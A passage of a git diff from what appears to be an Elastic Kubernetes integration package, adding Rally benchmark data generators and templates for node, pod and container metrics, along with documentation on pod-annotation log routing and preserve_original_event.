"/api/v1/namespaces/events/host-{{ $eventid }}", + "generate_name": "{{ $metadata_generate_name }}", + {{- if eq $type "Normal"}} + "annotations": { + "kubectl_kubernetes_io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"involvedObject\":{\"kind\":\"{{ $involved_object_kind }}\"},\"kind\":\"Event\",\"message\":\"{{ $message_normal }} {{ $reason_normal }}\",\"metadata\":{\"annotations\":{},\"name\":\"host-{{ $eventid }}\",\"namespace\":\"demo-{{ $eventid }}\"},\"type\":\"{{ $type }}\"}\n" + } + {{- else if eq $type "Warning"}} + {{- if eq $reason_warning "BackOff"}} + "annotations": { + "kubectl_kubernetes_io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"involvedObject\":{\"kind\":\"{{ $involved_object_kind }}\"},\"kind\":\"Event\",\"message\":\"{{ $message_warning_backoff }}\",\"metadata\":{\"annotations\":{},\"name\":\"host-{{ $eventid }}\",\"namespace\":\"demo-{{ $eventid }}\"},\"type\":\"{{ $type }}\"}\n" + } + {{- else if eq $reason_warning "Failed"}} + "annotations": { + "kubectl_kubernetes_io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"involvedObject\":{\"kind\":\"{{ $involved_object_kind }}\"},\"kind\":\"Event\",\"message\":\"{{ $message_warning_failed }}\",\"metadata\":{\"annotations\":{},\"name\":\"host-{{ $eventid }}\",\"namespace\":\"demo-{{ $eventid }}\"},\"type\":\"{{ $type }}\"}\n" + } + {{- end}} + {{- end}} + }, + "timestamp": { + "first_occurrence": "{{ $first_occurrence.Format "2006-01-02T15:04:05.000Z07:00" }}", + "last_occurrence": "{{ $last_occurrence.Format "2006-01-02T15:04:05.000Z07:00" }}" + }, + {{- if eq $type "Normal"}} + "message": "{{ $message_normal }} {{ $reason_normal }}", + "reason": "{{ $reason_normal }}", + "type": "{{ $type }}", + "count": {{ $event_count }}, + {{- else if eq $type "Warning"}} + {{- if eq $reason_warning "BackOff"}} + "message": "{{ $message_warning_backoff }}", + "reason": "{{ $reason_warning }}", + "type": "{{ $type }}", + "count": {{ $event_count }}, + {{- else if eq $reason_warning "Failed"}} + "message": "{{ $message_warning_failed }}", + "reason": "{{ $reason_warning }}", + "type": "{{ $type }}", + "count": {{ $event_count }}, + {{- end}} + {{- end}} + "source": { + "host": "host-{{ $eventid }}", + "component": "demo-component-{{ $eventid }}" + }, + "involved_object": { + "api_version": "v1", + "resource_version": "{{ $metadata_resource_version }}", + "name": "{{ $involved_object_name }}", + "kind": "{{ $involved_object_kind }}", + "uid": "host-{{ $eventid }}" + } + } + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": "5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/node-benchmark.yml new file mode 100644 index 00000000000..73df163f6bf --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 kubernetes.node events ingested +data_stream: + name: node +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./node-benchmark/template.ndjson + config: + path: ./node-benchmark/config.yml + fields: + path: ./node-benchmark/fields.yml diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/config.yml new file mode 100644 index 00000000000..44fb59b4a40 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/config.yml @@ -0,0 +1,97 @@ +fields: + - name: timestamp + period: 60m + - name: rangeofid + range: + min: 0 + max: 10000 + - name: duration_start + enum: ["-1h", "-2h", "-3h", "-4h"] + - name: event_duration + range: + min: 1 + max: 1000000 + - name: cpu_usage_core_ns + range: + min: 1 + max: 1000000000000 + - name: nanocores + range: + min: 1 + max: 1000000 + - name: memory_available_bytes + range: + min: 100000000001 + max: 200000000000 + - name: memory_usage_bytes + range: + min: 10000000001 + max: 90000000000 + - name: memory_rss_bytes + range: + min: 1 + max: 1000000000 + - name: memory_workingset_bytes + range: + min: 1000000000 + max: 9000000000 + - name: pagefaults + range: + min: 1 + max: 100000 + - name: majorpagefaults + range: + min: 0 + max: 100 + - name: network_rx_bytes + range: + min: 100000000 + max: 900000000 + - name: network_rx_errors + range: + min: 0 + max: 100 + - name: network_tx_bytes + range: + min: 10000000 + max: 90000000 + - name: network_tx_errors + range: + min: 0 + max: 100 + - name: fs_capacity_bytes + range: + min: 10000000000 + max: 20000000000 + - name: fs_available_bytes + range: + min: 1000000000 + max: 9000000000 + - name: fs_used_bytes + range: + min: 1000000000 + max: 9000000000 + - name: fs_inodes_used + range: + min: 100000 + max: 900000 + - name: fs_inodes_count + range: + min: 1000000 + max: 9000000 + - name: fs_inodes_free + range: + min: 1000000 + max: 9000000 + - name: runtime_imagefs_capacity_bytes + range: + min: 10000000000 + max: 20000000000 + - name: runtime_imagefs_available_bytes + range: + min: 1000000000 + max: 9000000000 + - name: runtime_imagefs_used_bytes + range: + min: 1000000000 + max: 9000000000 diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/fields.yml new file mode 100644 index 00000000000..f078cff60f8 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/fields.yml @@ -0,0 +1,56 @@ +- name: Ip + type: ip +- name: timestamp + type: date +- name: rangeofid + type: integer +- name: event_duration + type: long +- name: duration_start + type: keyword +- name: cpu_usage_core_ns + type: long +- name: nanocores + type: long +- name: cpu_usage_core_ns + type: long +- name: nanocores + type: long +- name: memory_available_bytes + type: long +- name: memory_usage_bytes + type: long +- name: memory_rss_bytes + type: long +- name: memory_workingset_bytes + type: long +- name: pagefaults + type: long +- name: majorpagefaults + type: long +- name: network_rx_bytes + type: long +- name: network_rx_errors + type: long +- name: network_tx_bytes + type: long +- name: network_tx_errors + type: long +- name: fs_capacity_bytes + type: long +- name: fs_available_bytes + type: long +- name: fs_used_bytes + type: long +- name: fs_inodes_used + type: long +- name: fs_inodes_count + type: long +- name: fs_inodes_free + type: long +- name: runtime_imagefs_capacity_bytes + type: long +- name: runtime_imagefs_available_bytes + type: long +- name: runtime_imagefs_used_bytes + type: long diff --git a/packages/kubernetes/_dev/benchmark/rally/node-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/template.ndjson new file mode 100644 index 00000000000..589e0a98068 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/node-benchmark/template.ndjson @@ -0,0 +1,160 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_duration := generate "event_duration" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $nodeid := div $rangeofid 110 -}} +{{- $duration_start := generate "duration_start" }} +{{- $startTime := generate "timestamp" | date_modify (print $duration_start) }} +{{- $memory_available_bytes := generate "memory_available_bytes" }} +{{- $memory_usage_bytes := generate "memory_usage_bytes" }} +{{- $memory_rss_bytes := generate "memory_rss_bytes" }} +{{- $memory_workingset_bytes := generate "memory_workingset_bytes" }} +{{- $pagefaults := generate "pagefaults" }} +{{- $majorpagefaults := generate "majorpagefaults" }} +{{- $network_rx_bytes := generate "network_rx_bytes" }} +{{- $network_rx_errors := generate "network_rx_errors" }} +{{- $network_tx_bytes := generate "network_tx_bytes" }} +{{- $network_tx_errors := generate "network_tx_errors" }} +{{- $fs_capacity_bytes := generate "fs_capacity_bytes" }} +{{- $fs_available_bytes := generate "fs_available_bytes" }} +{{- $fs_used_bytes := generate "fs_used_bytes" }} +{{- $fs_inodes_used := generate "fs_inodes_used" }} +{{- $fs_inodes_count := generate "fs_inodes_count" }} +{{- $fs_inodes_free := generate "fs_inodes_free" }} +{{- $runtime_imagefs_capacity_bytes := generate "runtime_imagefs_capacity_bytes" }} +{{- $runtime_imagefs_available_bytes := generate "runtime_imagefs_available_bytes" }} +{{- $runtime_imagefs_used_bytes := generate "runtime_imagefs_used_bytes" }} +{{- $cpu_usage_core_ns := generate "cpu_usage_core_ns" }} +{{- $nanocores := generate "nanocores" }} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", + "event": { + "dataset": "kubernetes.node", + "module": "kubernetes", + "agent_id_status": "verified", + "duration": {{ $event_duration }} + }, + "data_stream": { + "dataset": "kubernetes.node", + "namespace": "ep", + "type": "metrics" + }, + "service": { + "type": "kubernetes", + "address": "kubernetes-scale-123456:10250" + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": "5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + }, + "metricset": { + "name": "node", + "period": 10000 + }, + "kubernetes": { + "labels": { + "app":"demo", + "pod-template-hash":"{{ $rangeofid }}", + "app-2":"demo-2", + "app-1":"demo-1" + }, + "node": { + "memory": { + "available": { + "bytes": {{ $memory_available_bytes }} + }, + "usage": { + "bytes": {{ $memory_usage_bytes }} + }, + "workingset": { + "bytes": {{ $memory_workingset_bytes }} + }, + "rss": { + "bytes": {{ $memory_rss_bytes }} + }, + "pagefaults": {{ $pagefaults }}, + "majorpagefaults": {{ $majorpagefaults }} + }, + "network": { + "rx": { + "bytes": {{ $network_rx_bytes }}, + "errors": {{ $network_rx_errors }} + }, + "tx": { + "bytes": {{ $network_tx_bytes }}, + "errors": {{ $network_tx_errors }} + } + }, + "fs": { + "available": { + "bytes": {{ $fs_available_bytes }} + }, + "capacity": { + "bytes": {{ $fs_capacity_bytes }} + }, + "used": { + "bytes": {{ $fs_used_bytes }} + }, + "inodes": { + "count": {{ $fs_inodes_count }}, + "used": {{ $fs_inodes_used }}, + "free": {{ $fs_inodes_free }} + } + }, + "runtime": { + "imagefs": { + "capacity": { + "bytes": {{ $runtime_imagefs_capacity_bytes }} + }, + "used": { + "bytes": {{ $runtime_imagefs_used_bytes }} + }, + "available": { + "bytes": {{ $runtime_imagefs_available_bytes }} + } + } + }, + "start_time": "{{$startTime.Format "2006-01-02T15:04:05.000Z"}}", + "cpu": { + "usage": { + "core": { + "ns": {{ $cpu_usage_core_ns }} + }, + "nanocores": {{ $nanocores }} + } + } + } + }, + "agent": { + "name": "kubernetes-scale-123456", + "type": "metricbeat", + "version": "8.8.0", + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "id": "de42127b-4db8-4471-824e-a7b14f478663" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + "ecs": { + "version": "8.5.0" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml index e55a8d9e17c..dd23917b3de 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark.yml @@ -1,10 +1,10 @@ --- -description: Benchmark 864000 kubernetes.pod events ingested +description: Benchmark 8640000 kubernetes.pod events ingested data_stream: name: pod corpora: generator: - total_events: 864000 + total_events: 8640000 template: type: gotext path: ./pod-benchmark/template.ndjson diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml index 316bd153cd7..6a7b3710eca 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/config.yml @@ -37,8 +37,16 @@ fields: range: min: 9000 max: 10000 - - name: Percentage + - name: PercentageMemory range: - min: 0 - max: 5000 - fuzziness: 0.005 + min: 0.0 + max: 1.0 + - name: PercentageCPU + range: + min: 0.0 + max: 1.0 + - name: Nanocores + range: + min: 100000 + max: 9000000 + cardinality: 10000 diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml index 0b9b61742cc..b5f6a7dd17f 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/fields.yml @@ -26,7 +26,11 @@ type: integer - name: Ip type: ip -- name: Percentage +- name: PercentageMemory type: double +- name: PercentageCPU + type: double +- name: Nanocores + type: integer - name: agent.snapshot type: boolean diff --git a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson index df79a674fae..bb8a89c0e6e 100644 --- a/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson +++ b/packages/kubernetes/_dev/benchmark/rally/pod-benchmark/template.ndjson @@ -8,7 +8,9 @@ {{- $txbytes := generate "container.network.egress.bytes" }} {{- $rangeofid := generate "rangeofid" }} {{- $nodeid := div $rangeofid 110 -}} -{{- $pct := generate "Percentage" }} +{{- $pctmem := generate "PercentageMemory" }} +{{- $pctcpu := generate "PercentageCPU" }} +{{- $nanocores := generate "Nanocores" | mul 1000 -}} { "@timestamp": "{{$timestamp.Format `2006-01-02T15:04:05.999999Z07:00`}}", "container":{ "network":{ @@ -60,11 +62,11 @@ "major_page_faults":0, "usage":{ "node":{ - "pct": "{{divf $pct 1000000}}" + "pct": "{{$pctmem}}" }, "bytes": "{{generate `Bytes`}}", "limit":{ - "pct":"{{divf $pct 1000000}}" + "pct":"{{$pctmem}}" } }, "available":{ @@ -74,7 +76,7 @@ "working_set":{ "bytes": "{{generate `Bytes`}}", "limit":{ - "pct": "{{divf $pct 1000000}}" + "pct": "{{$pctmem}}" } } }, @@ -83,11 +85,11 @@ "cpu":{ "usage":{ "node":{ - "pct":0 + "pct":{{$pctcpu}} }, - "nanocores":0, + "nanocores":{{$nanocores}}, "limit":{ - "pct":0 + "pct":{{$pctcpu}} } } }, diff --git a/packages/kubernetes/_dev/benchmark/rally/state_container-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/state_container-benchmark.yml new file mode 100644 index 00000000000..8d7aa6fa62e --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/state_container-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 kubernetes.state_container events ingested +data_stream: + name: state_container +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./statecontainer-benchmark/template.ndjson + config: + path: ./statecontainer-benchmark/config.yml + fields: + path: ./statecontainer-benchmark/fields.yml diff --git a/packages/kubernetes/_dev/benchmark/rally/state_pod-benchmark.yml b/packages/kubernetes/_dev/benchmark/rally/state_pod-benchmark.yml new file mode 100644 index 00000000000..f3720822558 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/state_pod-benchmark.yml @@ -0,0 +1,14 @@ +--- +description: Benchmark 20000 kubernetes.state_pod events ingested +data_stream: + name: state_pod +corpora: + generator: + total_events: 20000 + template: + type: gotext + path: ./statepod-benchmark/template.ndjson + config: + path: ./statepod-benchmark/config.yml + fields: + path: ./statepod-benchmark/fields.yml diff --git a/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/config.yml new file mode 100644 index 00000000000..e86fba936de --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/config.yml @@ -0,0 +1,49 @@ +fields: + - name: timestamp + period: 60m + - name: event_duration + range: + min: 1 + max: 1000000 + - name: status_phase + enum: ["running", "waiting", "terminated"] + - name: status_ready + enum: ["true", "false"] + - name: restarts + range: + min: 1 + max: 100 + - name: reason_waiting + enum: ["ContainerCreating", "CrashLoopBackoff", "ErrImagePull", "ImagePullBackoff"] + - name: reason_terminated + enum: ["Completed", "ContainerCannotRun", "Error", "OOMKilled"] + - name: cpu_limit_cores + range: + min: 4 + max: 6 + - name: cpu_request_cores + range: + min: 0 + max: 3 + - name: memory_limit_bytes + range: + min: 1000000000 + max: 16000000000 + - name: memory_request_bytes + range: + min: 500000000 + max: 999000000 + - name: rangeofid + range: + min: 0 + max: 10000 + - name: cpu_limit_nanocores + range: + min: 10000000 + max: 30000000 + - name: cpu_request_nanocores + range: + min: 100000 + max: 300000 + - name: container_name + enum: ["web", "default-http-backend", "dnsmasq", "csi-driver", "web", "web", "web", "prometheus", "konnectivity-agent", "sidecar", "kubedns", "metrics-server-nanny", "web", "web", "fluentbit", "autoscaler", "gke-metrics-agent", "elastic-agent", "web", "kube-state-metrics", "metrics-server", "fluentbit", "elastic-agent", "web", "prometheus-to-sd-exporter"] diff --git a/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/fields.yml new file mode 100644 index 00000000000..688e8233c14 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/fields.yml @@ -0,0 +1,32 @@ +- name: Ip + type: ip +- name: timestamp + type: date +- name: rangeofid + type: integer +- name: event_duration + type: long +- name: container_name + type: keyword +- name: status_phase + type: keyword +- name: status_ready + type: boolean +- name: restarts + type: integer +- name: reason_waiting + type: keyword +- name: reason_terminated + type: keyword +- name: cpu_limit_cores + type: float +- name: cpu_request_cores + type: float +- name: memory_limit_bytes + type: long +- name: memory_request_bytes + type: long +- name: cpu_limit_nanocores + type: long +- name: cpu_request_nanocores + type: long diff --git a/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/template.ndjson new file mode 100644 index 00000000000..ff48f6e38ae --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statecontainer-benchmark/template.ndjson @@ -0,0 +1,174 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_duration := generate "event_duration" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $nodeid := div $rangeofid 110 -}} +{{- $container_name := generate "container_name" }} +{{- $status_phase := generate "status_phase" }} +{{- $status_ready := generate "status_ready" }} +{{- $restarts := generate "restarts" }} +{{- $reason_waiting := generate "reason_waiting" }} +{{- $reason_terminated := generate "reason_terminated" }} +{{- $cpu_limit_cores := generate "cpu_limit_cores" }} +{{- $cpu_request_cores := generate "cpu_request_cores" }} +{{- $memory_limit_bytes := generate "memory_limit_bytes" }} +{{- $memory_request_bytes := generate "memory_request_bytes" }} +{{- $cpu_limit_nanocores := generate "cpu_limit_nanocores" }} +{{- $cpu_request_nanocores := generate "cpu_request_nanocores" }} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", + "container": { + "image": { + "name": "k8s.gcr.io/coredns/coredns:v1.8.0" + }, + "runtime": "containerd", + "id": "container-{{ $rangeofid }}" + }, + "kubernetes": { + "container": { + "memory": { + "request": { + "bytes": {{ $memory_request_bytes }} + }, + "limit": { + "bytes": {{ $memory_limit_bytes }} + } + }, + "name": "{{ $container_name }}", + "cpu": { + "request": { + "cores": {{ $cpu_request_cores }}, + "nanocores": {{ $cpu_request_nanocores }} + }, + "limit": { + "cores": {{ $cpu_limit_cores }}, + "nanocores": {{ $cpu_limit_nanocores }} + } + }, + "id": "container-{{ $rangeofid }}", + "status": { + "phase": "{{ $status_phase }}", + {{- if eq $status_phase "running"}} + "ready": "true", + "last_terminated_reason": "{{ $reason_terminated }}", + {{- else if eq $status_phase "terminated"}} + "ready": "false", + "reason": "{{ $reason_terminated }}", + {{- else if eq $status_phase "waiting"}} + "ready": "{{ $status_ready }}", + "reason": "{{ $reason_waiting }}", + {{- end}} + "restarts": {{ $restarts }} + } + }, + "node": { + "uid": "host-{{ $nodeid }}", + "hostname": "host-{{ $nodeid }}", + "name": "host-{{ $nodeid }}", + "labels": { + "kubernetes_io/hostname": "kubernetes-scale-123456", + "beta_kubernetes_io/os": "linux", + "kubernetes_io/arch": "amd64", + "kubernetes_io/os": "linux", + "beta_kubernetes_io/arch": "amd64" + } + }, + "pod": { + "uid": "demo-pod-{{ $rangeofid }}", + "ip": "{{generate `Ip`}}", + "name": "demo-pod-{{ $rangeofid }}" + }, + "namespace": "demo-{{ $rangeofid }}", + "namespace_uid": "demo-{{ $rangeofid }}", + "replicaset": { + "name": "demo-deployment-{{ $rangeofid }}" + }, + "namespace_labels": { + "kubernetes_io/metadata_name": "demo-{{ $rangeofid }}" + }, + "labels": { + "app":"demo", + "pod-template-hash":"{{ $rangeofid }}", + "app-2":"demo-2", + "app-1":"demo-1" + }, + "deployment": { + "name": "demo-deployment-{{ $rangeofid }}" + } + }, + "agent": { + "name": "kubernetes-scale-123456", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "type": "metricbeat", + "version": "8.8.0" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "cloud": { + "provider": "gcp", + "availability_zone": "europe-west1-d", + "instance":{ + "name": "kubernetes-scale-123456" , + "id": "de42127b-4db8-4471-824e-a7b14f478663" + }, + "machine":{ + "type":"e2-standard-4" + }, + "service":{ + "name":"GCE" + }, + "project":{ + "id":"elastic-obs-integrations-dev" + }, + "account":{ + "id":"elastic-obs-integrations-dev" + } + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + "ecs": { + "version": "8.0.0" + }, + "data_stream": { + "namespace": "ep", + "type": "metrics", + "dataset": "kubernetes.state_container" + }, + "service": { + "address": "http://kubernetes-scale-123456:8080/metrics", + "type": "kubernetes" + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": "5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + }, + "metricset": { + "period": 10000, + "name": "state_container" + }, + "event": { + "duration": {{ $event_duration }}, + "agent_id_status": "verified", + "module": "kubernetes", + "dataset": "kubernetes.state_container" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/config.yml b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/config.yml new file mode 100644 index 00000000000..b21c1538b64 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/config.yml @@ -0,0 +1,15 @@ +fields: + - name: timestamp + period: 60m + - name: event_duration + range: + min: 1 + max: 1000000 + - name: rangeofid + range: + min: 0 + max: 10000 + - name: status_phase + enum: ["running", "pending", "succeeded", "failed", "unknown"] + - name: status_scheduled + enum: ["true", "false", "unknown"] diff --git a/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/fields.yml b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/fields.yml new file mode 100644 index 00000000000..b66d8979105 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/fields.yml @@ -0,0 +1,12 @@ +- name: Ip + type: ip +- name: timestamp + type: date +- name: rangeofid + type: integer +- name: event_duration + type: long +- name: status_phase + type: keyword +- name: status_scheduled + type: keyword diff --git a/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/template.ndjson b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/template.ndjson new file mode 100644 index 00000000000..c5d04c86bf4 --- /dev/null +++ b/packages/kubernetes/_dev/benchmark/rally/statepod-benchmark/template.ndjson @@ -0,0 +1,138 @@ +{{- $timestamp := generate "timestamp" }} +{{- $event_duration := generate "event_duration" }} +{{- $rangeofid := generate "rangeofid" -}} +{{- $nodeid := div $rangeofid 110 -}} +{{- $status_phase := generate "status_phase" }} +{{- $status_scheduled := generate "status_scheduled" }} +{ + "@timestamp": "{{$timestamp.Format "2006-01-02T15:04:05.999999Z07:00"}}", + "kubernetes": { + "node": { + "uid": "host-{{ $nodeid }}", + "hostname": "host-{{ $nodeid }}", + "name": "host-{{ $nodeid }}", + "labels": { + "kubernetes_io/hostname": "kubernetes-scale-123456", + "beta_kubernetes_io/os": "linux", + "kubernetes_io/arch": "amd64", + "kubernetes_io/os": "linux", + "beta_kubernetes_io/arch": "amd64" + } + }, + "pod": { + "uid": "demo-pod-{{ $rangeofid }}", + "host_ip": "{{generate `Ip`}}", + "ip": "{{generate `Ip`}}", + "name": "demo-pod-{{ $rangeofid }}", + "status": { + "phase": "{{ $status_phase }}", + {{- if eq $status_phase "running"}} + "ready": "true", + {{- else if eq $status_phase "pending"}} + "ready": "false", + {{- else if eq $status_phase "failed"}} + "ready": "false", + {{- else if eq $status_phase "succeeded"}} + "ready": "true", + {{- else if eq $status_phase "unknown"}} + "ready": "unknown", + {{- end}} + "scheduled": "{{ $status_scheduled }}" + } + + }, + "namespace": "demo-{{ $rangeofid }}", + "namespace_uid": "demo-{{ $rangeofid }}", + "replicaset": { + "name": "demo-deployment-{{ $rangeofid }}" + }, + "namespace_labels": { + "kubernetes_io/metadata_name": "demo-{{ $rangeofid }}" + }, + "labels": { + "app":"demo", + "pod-template-hash":"{{ $rangeofid }}", + "app-2":"demo-2", + "app-1":"demo-1" + }, + "deployment": { + "name": "demo-deployment-{{ $rangeofid }}" + } + }, + "agent": { + "name": "kubernetes-scale-123456", + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "ephemeral_id": "22ed892c-43bd-408a-9121-65e2f5b6a56e", + "type": "metricbeat", + "version": "8.8.0" + }, + "elastic_agent": { + "id": "de42127b-4db8-4471-824e-a7b14f478663", + "version": "8.8.0", + "snapshot": true + }, + "cloud": { + "provider": "gcp", + "availability_zone": "europe-west1-d", + "instance":{ + "name": "kubernetes-scale-123456" , + "id": "de42127b-4db8-4471-824e-a7b14f478663" + }, + "machine":{ + "type":"e2-standard-4" + }, + "service":{ + "name":"GCE" + }, + "project":{ + "id":"elastic-obs-integrations-dev" + }, + "account":{ + "id":"elastic-obs-integrations-dev" + } + }, + "orchestrator":{ + "cluster":{ + "name":"kubernetes-scale", + "url":"https://{{ generate `Ip` }}" + } + }, + "ecs": { + "version": "8.0.0" + }, + "data_stream": { + "namespace": "ep", + "type": "metrics", + "dataset": "kubernetes.state_pod" + }, + "service": { + "address": "http://kubernetes-scale-123456:8080/metrics", + "type": "kubernetes" + }, + "host": { + "hostname": "kubernetes-scale-123456", + "os": { + "kernel": "5.10.47-linuxkit", + "codename": "Core", + "name": "CentOS Linux", + "type": "linux", + "family": "redhat", + "version": "7 (Core)", + "platform": "centos" + }, + "containerized": true, + "name": "kubernetes-scale-123456", + "id": "85e35c2b5e1b39ba72393a6baf6ee7cd", + "architecture": "x86_64" + }, + "metricset": { + "period": 10000, + "name": "state_pod" + }, + "event": { + "duration": {{ $event_duration }}, + "agent_id_status": "verified", + "module": "kubernetes", + "dataset": "kubernetes.state_pod" + } +} \ No newline at end of file diff --git a/packages/kubernetes/_dev/build/docs/README.md b/packages/kubernetes/_dev/build/docs/README.md index 3c92012f223..16d3e0151b2 100644 --- a/packages/kubernetes/_dev/build/docs/README.md +++ b/packages/kubernetes/_dev/build/docs/README.md @@ -86,12 +86,21 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. #### Routing -The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. +The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. For example, suppose you are running Nginx on your Kubernetes cluster, and you want to drive the Nginx container logs into a dedicated dataset or namespace. By annotating the pod with `elastic.co/namespace: nginx`, the integration will send all the container logs to the `nginx` namespace. To learn more about routing container-logs, see https://docs.elastic.co/integrations/kubernetes/container-logs. +#### Preserve original event + +The agent can be configured to set the tag `preserve_original_event` on container-logs using pod annotation. + +For example, suppose you are routing your Nginx container logs into a dedicated dataset or namespace as described above to make use of the Nginx fleet integration. Enabling preserve_original_event on the Nginx integration will have no effect +since the logs were shipped via kubernetes integration and not Nginx. As well, you may not want to have all original events from all Nginx pods preserved as well. + +By annotating the pod with `elastic.co/preserve_original_event: 'true'`, the integration will add the tag `preserve_original_event` as it would be done by the `nginx` integration otherwise. + ### audit-logs The audit-logs dataset requires access to the log files on each Kubernetes node where the audit logs are stored. diff --git a/packages/kubernetes/_dev/build/docs/container-logs.md b/packages/kubernetes/_dev/build/docs/container-logs.md index a47fc79bde2..c514418d72c 100644 --- a/packages/kubernetes/_dev/build/docs/container-logs.md +++ b/packages/kubernetes/_dev/build/docs/container-logs.md @@ -8,17 +8,17 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. By default only {{ url "filebeat-input-filestream-parsers" "container parser" }} is enabled. Additional log parsers can be added as an advanced options configuration. -## Rerouting based on pod annotations +## Rerouting and preserve original event based on pod annotations -You can customize the routing of container logs events and sending them to different datasets and namespaces using pods' annotations. +You can customize the routing of container logs events and sending them to different datasets and namespaces, +as well as enable `preserve_original_event` based on using pods' annotations. -Routing customization can happen at: +Customization can happen at: - pod definition time, e.g., using a deployment. - pod runtime, annotating pods using `kubectl`. - -### Set routing at pod definition time +### Set at pod definition time Here is an example of an Nginx deployment where we set both `elastic.co/dataset` and `elastic.co/namespace` annotations to route the container logs to specific datasets and namespace, 